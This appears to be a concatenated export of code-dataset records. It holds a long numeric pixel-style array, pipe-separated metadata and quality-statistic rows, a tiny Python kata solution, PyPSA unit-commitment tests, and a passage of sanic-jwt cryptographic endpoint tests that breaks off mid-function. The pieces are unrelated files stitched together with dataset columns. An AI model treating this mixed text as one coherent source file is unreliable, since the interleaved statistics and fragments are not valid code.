224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 248, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 4, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248,
0, 248, 0, 248, 0, 248, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 255, 224, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31,
0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0,
31, 0, 31, 0, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4,
0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255
]
| 81.387622
| 681
| 0.368827
| 14,519
| 49,972
| 1.268407
| 0.008127
| 1.234144
| 1.747774
| 2.201998
| 0.970732
| 0.961609
| 0.955962
| 0.943907
| 0.942659
| 0.939944
| 0
| 0.535571
| 0.338129
| 49,972
| 613
| 682
| 81.520392
| 0.021224
| 0.002241
| 0
| 0.721393
| 0
| 0
| 0.003169
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001658
| false
| 0
| 0
| 0
| 0.001658
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
9117274907d969e63ef9247fc06311ca67735559
| 95
|
py
|
Python
|
8 kyu/Will you make it?/Will you make it?.py
|
anthonyjatoba/codewars
|
76b0d66dd1ba76a4d136b658920cdf85fd5c4b06
|
[
"MIT"
] | null | null | null |
8 kyu/Will you make it?/Will you make it?.py
|
anthonyjatoba/codewars
|
76b0d66dd1ba76a4d136b658920cdf85fd5c4b06
|
[
"MIT"
] | null | null | null |
8 kyu/Will you make it?/Will you make it?.py
|
anthonyjatoba/codewars
|
76b0d66dd1ba76a4d136b658920cdf85fd5c4b06
|
[
"MIT"
] | null | null | null |
def zero_fuel(distance_to_pump, mpg, fuel_left):
return distance_to_pump <= mpg * fuel_left
| 47.5
| 48
| 0.778947
| 16
| 95
| 4.1875
| 0.5625
| 0.298507
| 0.41791
| 0.507463
| 0.746269
| 0.746269
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136842
| 95
| 2
| 49
| 47.5
| 0.817073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
911cd3f2e28400e227d18efacf83d7763fb0f4c9
| 3,129
|
py
|
Python
|
test/test_unit_commitment.py
|
hertelm/PyPSA
|
7c0561ebaa104a264ca6229c72c82370cbab66f5
|
[
"MIT"
] | 594
|
2017-10-20T19:02:15.000Z
|
2022-03-31T10:16:23.000Z
|
test/test_unit_commitment.py
|
hertelm/PyPSA
|
7c0561ebaa104a264ca6229c72c82370cbab66f5
|
[
"MIT"
] | 271
|
2017-10-23T15:12:03.000Z
|
2022-03-29T10:20:36.000Z
|
test/test_unit_commitment.py
|
hertelm/PyPSA
|
7c0561ebaa104a264ca6229c72c82370cbab66f5
|
[
"MIT"
] | 286
|
2017-10-23T09:45:15.000Z
|
2022-03-28T15:23:40.000Z
|
import pypsa
import pytest
import numpy as np
from numpy.testing import assert_array_almost_equal as equal
solver_name = "glpk"
@pytest.mark.parametrize("pyomo", [True, False])
def test_part_load(pyomo):
"""This test is based on
https://pypsa.org/examples/unit-commitment.html
and is not very comprehensive."""
nu = pypsa.Network()
snapshots = range(4)
nu.set_snapshots(snapshots)
nu.add("Bus", "bus")
nu.add("Generator", "coal",
bus="bus",
committable=True,
p_min_pu=0.3,
marginal_cost=20,
p_nom=10000)
nu.add("Generator", "gas",
bus="bus",
committable=True,
marginal_cost=70,
p_min_pu=0.1,
p_nom=1000)
nu.add("Load", "load",
bus="bus",
p_set=[4000,6000,5000,800])
nu.lopf(nu.snapshots, solver_name=solver_name, pyomo=pyomo)
expected_status = np.array([[1,1,1,0],[0,0,0,1]], dtype=float).T
equal(nu.generators_t.status.values, expected_status)
expected_dispatch = np.array([[4000,6000,5000,0],[0,0,0,800]], dtype=float).T
equal(nu.generators_t.p.values, expected_dispatch)
def test_minimum_up_time():
"""This test is based on
https://pypsa.org/examples/unit-commitment.html
and is not very comprehensive."""
nu = pypsa.Network()
snapshots = range(4)
nu.set_snapshots(snapshots)
nu.add("Bus", "bus")
nu.add("Generator", "coal",
bus="bus",
committable=True,
p_min_pu=0.3,
marginal_cost=20,
p_nom=10000)
nu.add("Generator", "gas",
bus="bus",
committable=True,
marginal_cost=70,
p_min_pu=0.1,
up_time_before=0,
min_up_time=3,
p_nom=1000)
nu.add("Load", "load",
bus="bus",
p_set=[4000,800,5000,3000])
nu.lopf(nu.snapshots,solver_name=solver_name)
expected_status = np.array([[1,0,1,1],[1,1,1,0]],dtype=float).T
equal(nu.generators_t.status.values,expected_status)
expected_dispatch = np.array([[3900,0,4900,3000],[100,800,100,0]],dtype=float).T
equal(nu.generators_t.p.values,expected_dispatch)
def test_minimum_down_time():
"""This test is based on
https://pypsa.org/examples/unit-commitment.html
and is not very comprehensive."""
nu = pypsa.Network()
nu.set_snapshots(range(4))
nu.add("Bus", "bus")
nu.add("Generator", "coal",
bus="bus",
committable=True,
p_min_pu=0.3,
marginal_cost=20,
min_down_time=2,
down_time_before=1,
p_nom=10000)
nu.add("Generator", "gas",
bus="bus",
committable=True,
marginal_cost=70,
p_min_pu=0.1,
p_nom=4000)
nu.add("Load", "load",
bus="bus",
p_set=[3000,800,3000,8000])
nu.lopf(nu.snapshots,solver_name=solver_name)
expected_status = np.array([[0,0,1,1],[1,1,0,0]],dtype=float).T
equal(nu.generators_t.status.values,expected_status)
expected_dispatch = np.array([[0,0,3000,8000],[3000,800,0,0]],dtype=float).T
equal(nu.generators_t.p.values,expected_dispatch)
| 22.510791
| 84
| 0.615213
| 463
| 3,129
| 3.99784
| 0.187905
| 0.032415
| 0.045381
| 0.068071
| 0.812534
| 0.792004
| 0.792004
| 0.792004
| 0.759589
| 0.758509
| 0
| 0.077879
| 0.228508
| 3,129
| 138
| 85
| 22.673913
| 0.688898
| 0.096516
| 0
| 0.702381
| 0
| 0
| 0.054937
| 0
| 0
| 0
| 0
| 0
| 0.011905
| 1
| 0.035714
| false
| 0
| 0.047619
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e66e05da8e5e13ce64ebeb5aab031022c2cd3f88
| 11,964
|
py
|
Python
|
tests/test_endpoints_jwt_cryptography.py
|
zwjat/sanic-jwt
|
3776cb8f76ccc15b4076d1e9e2f9347884bf25b7
|
[
"MIT"
] | null | null | null |
tests/test_endpoints_jwt_cryptography.py
|
zwjat/sanic-jwt
|
3776cb8f76ccc15b4076d1e9e2f9347884bf25b7
|
[
"MIT"
] | null | null | null |
tests/test_endpoints_jwt_cryptography.py
|
zwjat/sanic-jwt
|
3776cb8f76ccc15b4076d1e9e2f9347884bf25b7
|
[
"MIT"
] | null | null | null |
import binascii
import os
from pathlib import Path
from sanic import Sanic
from sanic.response import json
import pytest
from sanic_jwt import Configuration, exceptions, Initialize
from sanic_jwt.decorators import protected
@pytest.yield_fixture
def public_rsa_key():
yield Path(__file__).parent / "resources" / "rsa-test-public.pem"
@pytest.yield_fixture
def private_rsa_key():
yield Path(__file__).parent / "resources" / "rsa-test-key.pem"
@pytest.yield_fixture
def public_ec_key():
yield Path(__file__).parent / "resources" / "ec-test-public.pem"
@pytest.yield_fixture
def private_ec_key():
yield Path(__file__).parent / "resources" / "ec-test-key.pem"
async def authenticate(request, *args, **kwargs):
return {"user_id": 1}
def test_jwt_rsa_crypto_from_path_object(public_rsa_key, private_rsa_key):
app = Sanic()
sanicjwt = Initialize(
app,
authenticate=authenticate,
public_key=public_rsa_key,
private_key=private_rsa_key,
algorithm="RS256",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_rsapss_crypto_from_path_object(public_rsa_key, private_rsa_key):
app = Sanic()
sanicjwt = Initialize(
app,
authenticate=authenticate,
secret=public_rsa_key,
private_key=private_rsa_key,
algorithm="PS256",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_ec_crypto_from_path_object(public_ec_key, private_ec_key):
app = Sanic()
sanicjwt = Initialize(
